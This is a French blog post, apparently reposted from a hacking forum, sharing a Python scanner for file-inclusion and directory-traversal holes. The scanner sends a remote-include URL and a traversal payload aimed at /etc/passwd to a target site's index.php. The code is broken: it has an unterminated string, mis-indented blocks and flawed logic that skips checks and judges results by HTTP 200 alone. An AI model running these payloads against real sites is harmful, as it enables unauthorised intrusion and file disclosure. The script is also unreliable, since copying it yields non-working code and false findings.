samedi 12 mars 2016

(Python) mon scanner de vulnérabilités Include et directory traversal

Salut à tous !!
Aujourd'hui je partage avec vous mon simple scanner de LFI et RFI écrit en python
vous aurez besoin du module requests et l'interpréteur python +3.0
CODE
Code:

"""  IDTscan(Include and Directory Traversal scanner ) is a script written in python for Web-audit and penetration testing .
It scan a host for discover  include and directory traversal vulnerabilities  fastly !!
The author isn't responable for all damages caused by script
Author:Had1x aka H11
licence: GNU GPL V3
Requirements :
-requests module
-python version + 3.0
Installing requests in Debian-based distribution :
sudo apt-get install python-pip
pip install requests
Usage:
python IDTscan.py http://ift.tt/1O73Z9g
./IDTscan.py http://ift.tt/1nFFZyb; """


import sys
import time
try:
    import requests
except ImportError:
    print ("please install requests module with pip ")
    sys.exit()

if  len(sys.argv) != 2:
    print ("Usage : python IDTscan.py  https://www.domain.com ")
elif len(sys.argv) == 2:
    domain = sys.argv[1]
    include_url = ((domain) + "/index.php?page=http://ift.tt/1kZGI9X;)
    directory_traversal_url = ((domain) + "/index.php?page=.../.../.../.../etc/passwd")
    print ("_____ _____ _______")
    print(" |_  _|  __ \__  __| ")
    print (" | | | |  | | | |___  ___ __ _ _ __    ")
    print (" | | | |  | | | / __|/ __/ _` | '_ \ ")                 
    print (" | |_| |__| | | \__ \ (_| (_| | || | ")
    print (" |__ __|_____/|_|___/\___\__,_|_||_| ")
    print ("")
    print ("author: Had1X ")
    time.sleep(2)
    print ("")
    print ("[+] scanning : ",(domain),"...")
    print ("scanning for include vulnerability ...")
    r = requests.get(include_url)
    if (r.status_code) == (requests.codes.ok):
        time.sleep(2)
        print ("[+] include vulnerability was discovered:\n ",(include_url))
        include_vuln = True
        time.sleep(2)
    else:
        print (" [-] include vulnerability was no discovered ")
        include_vuln = False
        time.sleep(2)
        print ("")
        print (" scanning host for directory traversal  vulnerability ... ")
        time.sleep(2)
        d  = requests.get(directory_traversal_url)
        if (d.status_code)  == (requests.codes.ok):
          print (" [+] directory traversal vulnerability was discovered :\n",(directory_traversal_url))
          dir_trav_vuln = True
          time.sleep(3)
          print ("")
        else:
        print ("[-]directory traversal vulnerability was no discovered ")
        dir_trav_vuln = False
        time.sleep(3)
        print ("")

    if (include_vuln) == True and (dir_trav_vuln) == True :
        print ("[*] host : ",(domain))
        print ("[+]Include vulnerability : Yes ")
        print  ("[+]Directory traversal vulnerability :  Yes ")
        time.sleep(3)
        sys.exit()
    elif (include_vuln) == False  and (dir_trav_vuln) ==  False :
        print ("[*]host ",(domain))
        print ("[-]Include vulnerability : No ")
        print  ("[-]Directory traversal vulnerability : No ")
        time.sleep(3)
        sys.exit()
    elif (include_vuln)  == True and (dir_trav_vuln) == False :
        print ("[*] host ",(domain))
        print ("[+]Include vulnerability : Yes ")
        print ("[-]Directory traversal : No ")
        time.sleep(3)
        sys.exit()
    else:
        print ("host : ",(domain))
        print ("[-]Include vulnerability : No ")
        print ("")
        print ("[+]Directory traversal vulnerabilty : Yes")
        print (" page : ",(directory_traversal_url))
        time.sleep(3)
        sys.exit()

Ps: vos propositions et commentaires sont les bienvenu , merci à Blend pour son aide


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1nFFYuf
via IFTTT

Aucun commentaire:

Enregistrer un commentaire